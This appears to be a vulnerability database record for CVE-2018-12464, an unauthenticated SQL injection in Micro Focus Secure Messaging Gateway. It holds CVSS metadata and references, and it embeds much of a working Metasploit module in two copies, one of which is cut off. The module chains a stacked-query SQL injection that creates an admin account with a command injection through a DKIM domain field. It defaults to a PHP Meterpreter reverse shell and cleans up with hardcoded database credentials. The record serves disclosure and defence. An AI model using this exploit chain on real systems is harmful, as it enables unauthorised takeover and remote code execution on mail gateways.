    "description": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).",
    "id": "GSD-2018-12464",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-12464"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-12464"
      ],
      "details": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).",
      "id": "GSD-2018-12464",
      "modified": "2023-12-13T01:22:30.220059Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security@microfocus.com",
        "DATE_PUBLIC": "2018-06-28T16:00:00.000Z",
        "ID": "CVE-2018-12464",
        "STATE": "PUBLIC",
        "TITLE": "Unauthenticated SQL injection in Micro Focus Secure Messaging Gateway"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Secure Messaging Gateway",
                    "version": {
                      "version_data": [
                        {
                          "affected": "\u003c",
                          "version_value": "471 "
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Micro Focus"
            }
          ]
        }
      },
      "credit": [
        {
          "lang": "eng",
          "value": "Mehmet INCE from PRODAFT"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "Unauthenticated SQL injection (CWE-89)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "45083",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "name": "https://support.microfocus.com/kb/doc.php?id=7023132",
            "refsource": "CONFIRM",
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
          },
          {
            "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
            "refsource": "CONFIRM",
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          }
        ]
      },
      "solution": [
        {
          "lang": "eng",
          "value": "Please upgrade to Secure Messaging Gateway 471 or newer using the online update tool in the Secure Messaging Gateway management console."
        }
      ],
      "source": {
        "defect": [
          "GWAV-2258"
        ],
        "discovery": "EXTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "471",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security@suse.com",
          "ID": "CVE-2018-12464"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-89"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://support.microfocus.com/kb/doc.php?id=7023132",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
            },
            {
              "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
            },
            {
              "name": "45083",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/45083/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-09T23:33Z",
      "publishedDate": "2018-06-29T16:29Z"
    }
  }
}

VAR-201806-1215

Vulnerability from variot - Updated: 2023-12-18 13:24

A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. An unauthenticated user can execute a terminal command under the context of the web user.

    One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
    which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. 
    manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
    to access this endpoint without having a valid session.

    Combining these vulnerabilities gives the opportunity execute operation system commands under the context
    of the web user. 
  },
  'License'        => MSF_LICENSE,
  'Author'         =>
    [
      'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
    ],
  'References'     =>
    [
      ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
      ['CVE', '2018-12464'],
      ['CVE', '2018-12465'],
      ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
      ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
    ],
  'DefaultOptions'  =>
    {
      'Payload' => 'php/meterpreter/reverse_tcp',
      'Encoder' => 'php/base64'
    },
  'Platform'       => ['php'],
  'Arch'           => ARCH_PHP,
  'Targets'        => [[ 'Automatic', { }]],
  'Privileged'     => false,
  'DisclosureDate' => "Jun 19 2018",
  'DefaultTarget'  => 0
))

register_options(
  [
    OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
  ]
)

end

def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3))

send_request_cgi(
  'method'  => 'POST',
  'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
  'vars_post' => {
    'appkey' => sql
  }
)

end

def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end

def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end

def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } })

if res && res.code == 200 && res.body.include?('DbNodeId')
  # Defining as global variable since we need to access them later within clean up function. 
  begin
    @domainid  = res.get_json_document['Nodes'][0]['DbNodeId']
    @dkimid  = res.get_json_document['Nodes'][1]['DbNodeId']
  rescue => e
    fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
  end
  print_good('Payload is successfully implanted')
else
  something_went_wrong
end

end

def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges')

# Defining as global variable since we need to access them later within clean up function. 
@username = rand_text_alpha_lower(5..25)
@userid = rand_text_numeric(6..8)
query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"

execute_query(query)
res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")

if res && res.code == 200 && res.body.include?(@username)
  print_good("User successfully created. Username : #{@username}")
else
  something_went_wrong
end

end

def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end

def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end

create_user
cookie = login
implant_payload(cookie)

print_status('Triggering an implanted payload')
send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
  'cookie' => cookie,
  'vars_get' => {
    'cache' => 0,
  },
  'vars_post' => {
    'DkimRecordId' => @dkimid
  }
})

end

def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end

end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1215",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "secure messaging gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "microfocus",
        "version": "471"
      },
      {
        "model": "micro focus secure messaging gateway",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "microfocus",
        "version": "471"
      },
      {
        "model": "focus secure messaging gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "micro",
        "version": "471"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "471",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MEHMET INCE",
    "sources": [
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2018-12464",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2018-12464",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-122426",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security@opentext.com",
            "availabilityImpact": "HIGH",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-12464",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-12464",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "security@opentext.com",
            "id": "CVE-2018-12464",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201807-018",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-122426",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). \nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. \n        An unauthenticated user can execute a terminal command under the context of the web user. \n\n        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. \n        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It\u0027s not possible\n        to access this endpoint without having a valid session. \n\n        Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n        of the web user. \n      },\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Mehmet Ince \u003cmehmet@mehmetince.net\u003e\u0027 # author \u0026 msf module\n        ],\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027URL\u0027, \u0027https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],\n          [\u0027CVE\u0027, \u00272018-12464\u0027],\n          [\u0027CVE\u0027, \u00272018-12465\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023132\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023133\u0027]\n        ],\n      \u0027DefaultOptions\u0027  =\u003e\n        {\n          \u0027Payload\u0027 =\u003e \u0027php/meterpreter/reverse_tcp\u0027,\n          \u0027Encoder\u0027 =\u003e \u0027php/base64\u0027\n        },\n      \u0027Platform\u0027       =\u003e [\u0027php\u0027],\n      \u0027Arch\u0027           =\u003e ARCH_PHP,\n      \u0027Targets\u0027        =\u003e [[ \u0027Automatic\u0027, { }]],\n      \u0027Privileged\u0027     =\u003e false,\n      \u0027DisclosureDate\u0027 =\u003e \"Jun 19 2018\",\n      \u0027DefaultTarget\u0027  =\u003e 0\n    ))\n\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The URI of the vulnerable instance\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  def execute_query(query)\n    #\n    # We have a very rare SQLi case in here. Normally, it\u0027s would be very easy to exploit it by using time-based techniques\n    # but since we are able to use stacked-query approach, following form of payload is required in order to be able\n    # get back the output of query !\n    #\n    sql = rand_text_alphanumeric(3 + rand(3))\n    sql \u003c\u003c \"\u0027) LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; \"\n    sql \u003c\u003c query\n    sql \u003c\u003c \"; -- \"\n    sql \u003c\u003c rand_text_alphanumeric(3 + rand(3))\n\n    send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027api\u0027, \u00271\u0027, \u0027enginelist.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027appkey\u0027 =\u003e sql\n      }\n    )\n\n  end\n\n  def something_went_wrong\n    fail_with Failure::Unknown, \u0027Something went wrong\u0027\n  end\n\n  def check\n    r = rand_text_numeric(15..35)\n    res = execute_query(\"SELECT #{r}\")\n    unless res\n      vprint_error \u0027Connection failed\u0027\n      return CheckCode::Unknown\n    end\n    unless res.code == 200 \u0026\u0026 res.body.include?(r)\n      return CheckCode::Safe\n    end\n    CheckCode::Vulnerable\n  end\n\n  def implant_payload(cookie)\n    print_status(\u0027Creating a domain record with a malformed DKIM data\u0027)\n    p = [\n      {\n        :id =\u003e \u0027temp_0\u0027,\n        :Description =\u003e rand_text_alpha(5),\n        :DkimList =\u003e [\n          {\n            :Domain =\u003e \"$(php -r \u0027#{payload.encoded}\u0027)\",\n            :Selector =\u003e \u0027\u0027,\n            :TempId =\u003e \u0027tempDkim_1\u0027\n          }\n        ]\n      }\n    ].to_json\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_save_data.json.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027StateData\u0027 =\u003e \u0027[{\"ouid\":1}]\u0027,\n        \u0027SaveData\u0027 =\u003e p\n      }\n    })\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027DbNodeId\u0027)\n      # Defining as global variable since we need to access them later within clean up function. \n      begin\n        @domainid  = res.get_json_document[\u0027Nodes\u0027][0][\u0027DbNodeId\u0027]\n        @dkimid  = res.get_json_document[\u0027Nodes\u0027][1][\u0027DbNodeId\u0027]\n      rescue =\u003e e\n        fail_with Failure::UnexpectedReply, \"Something went horribly wrong while implanting the payload : #{e.message}\"\n      end\n      print_good(\u0027Payload is successfully implanted\u0027)\n    else\n      something_went_wrong\n    end\n  end\n\n  def create_user\n    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection\n    # issue location where requires a valid session !\n    print_status(\u0027Creating a user with appropriate privileges\u0027)\n\n    # Defining as global variable since we need to access them later within clean up function. \n    @username = rand_text_alpha_lower(5..25)\n    @userid = rand_text_numeric(6..8)\n    query = \"INSERT INTO account VALUES (#{@userid}, 1, \u0027#{@username}\u0027, \u00270\u0027, \u0027\u0027, 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)\"\n\n    execute_query(query)\n    res = execute_query(\"SELECT * FROM account WHERE loginname = \u0027#{@username}\u0027\")\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(@username)\n      print_good(\"User successfully created. Username : #{@username}\")\n    else\n      something_went_wrong\n    end\n  end\n\n  def login\n    print_status(\"Authenticating with created user\")\n    res = send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027security\u0027, \u0027securitygate.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027username\u0027 =\u003e @username,\n        \u0027password\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027passwordmandatory\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027LimitInterfaceId\u0027 =\u003e 1\n      }\n    )\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027/ui/default/index.php\u0027)\n      print_good(\u0027Successfully authenticated\u0027)\n      cookie = res.get_cookies\n    else\n      something_went_wrong\n    end\n    cookie\n  end\n\n  def exploit\n    unless check == CheckCode::Vulnerable\n      fail_with Failure::NotVulnerable, 